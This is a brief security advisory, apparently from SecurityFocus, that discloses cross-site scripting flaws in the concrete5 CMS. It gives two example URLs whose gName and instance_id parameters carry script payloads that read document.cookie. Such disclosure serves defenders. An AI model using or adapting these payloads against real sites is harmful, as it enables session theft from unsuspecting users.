concrete5 Multiple Cross-Site Scripting Vulnerabilities

An attacker can exploit these issues by enticing an unsuspecting user to visit a specially crafted URL.

The following example URIs are available:

http://www.example.com/index.php/dashboard/users/groups/bulkupdate/search?gName=";<script>alert(document.cookie)</script>&ccm-submit-button=Search

http://www.example.com/index.php/tools/required/dashboard/sitemap_drag_request?origCID=147&destCID=148&instance_id=";><BODY ONLOAD=alert(document.cookie)>&ctask=MOVE&ccm_token=1418116264:3ac1b1774e77fbc61b1c6b97a4f7c9ea&dragMode=


 

Privacy Statement
Copyright 2010, SecurityFocus